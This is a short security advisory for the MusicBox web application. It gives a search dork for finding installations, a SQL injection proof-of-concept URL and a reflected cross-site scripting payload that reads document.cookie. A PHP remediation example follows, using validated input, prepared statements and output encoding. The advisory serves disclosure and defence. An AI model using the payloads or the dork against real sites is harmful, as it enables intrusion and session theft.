============================================================
MusicBox <= v3.7 Multiple Vulnerabilities
============================================================
[~] Author : R@1D3N (amin emami)
[~] Software Link : www.musicboxv2.com
[~] Price : $275
[~] Version : v3.7 and previous versions
[~] Contact : aminrayden@yahoo.com
[~] DorK : inurl:genre_artists.php
[~] Forum : http://ashiyane.org/forums/
[~] Greetz : ItSecTeam, Inj3ct0r, Exploit-db
[~] Tested on: Windows XP Sp3
Vul1. SQL Injection:
[host]/index.php?action=top&type=Songs&show=10'[ SQL ATTACK]
Vul2. Cross Site Scripting:
[host]/index.php?in=song&term="><script>alert(document.cookie)<%2Fscript>&action=search&start=0
Fix: filter input
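One way to apply that fix to the two parameters above, as an added example (not MusicBox source code and not from the advisory author). The songs table, its columns, the helper names and the in-memory SQLite database are assumptions made so the snippet runs on its own; the sample rows and request values are constructed.

```php
<?php
// Added example; not MusicBox source. Schema and function names are assumed.

/** Validate "show": digits only, clamped to a sane page size. */
function parse_show(array $query, int $default = 10, int $max = 100): int
{
    $raw = $query['show'] ?? '';
    if (!is_string($raw) || !ctype_digit($raw)) {
        return $default;               // "10'" is not all digits, so it is rejected
    }
    return max(1, min((int) $raw, $max));
}

/** Top list: the limit is bound as an integer, never concatenated into SQL. */
function top_songs(PDO $db, int $limit): array
{
    $stmt = $db->prepare('SELECT title, artist FROM songs ORDER BY plays DESC LIMIT :n');
    $stmt->bindValue(':n', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Search: the term is bound as data; LIKE wildcards are escaped with "!". */
function search_songs(PDO $db, string $term): array
{
    $like = '%' . str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term) . '%';
    $stmt = $db->prepare("SELECT title, artist FROM songs WHERE title LIKE :t ESCAPE '!'");
    $stmt->execute([':t' => $like]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Encode for HTML text and quoted-attribute contexts before echoing. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed demo data and request values mirroring the two URLs above.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE songs (title TEXT, artist TEXT, plays INTEGER)');
$db->exec("INSERT INTO songs VALUES ('Song A', 'Artist A', 5), ('Song B', 'Artist B', 9)");

$query = ['show' => "10'", 'term' => '"><script>alert(document.cookie)</script>'];

$rows = top_songs($db, parse_show($query));    // falls back to the default limit
$hits = search_songs($db, $query['term']);     // payload is matched as plain text
echo 'Top rows: ', count($rows), "\n";
echo 'Results for "', h($query['term']), '": ', count($hits), "\n";
```

Input validation handles the numeric parameter; for the search term the protection comes from binding it in the query and encoding it at output, not from stripping characters.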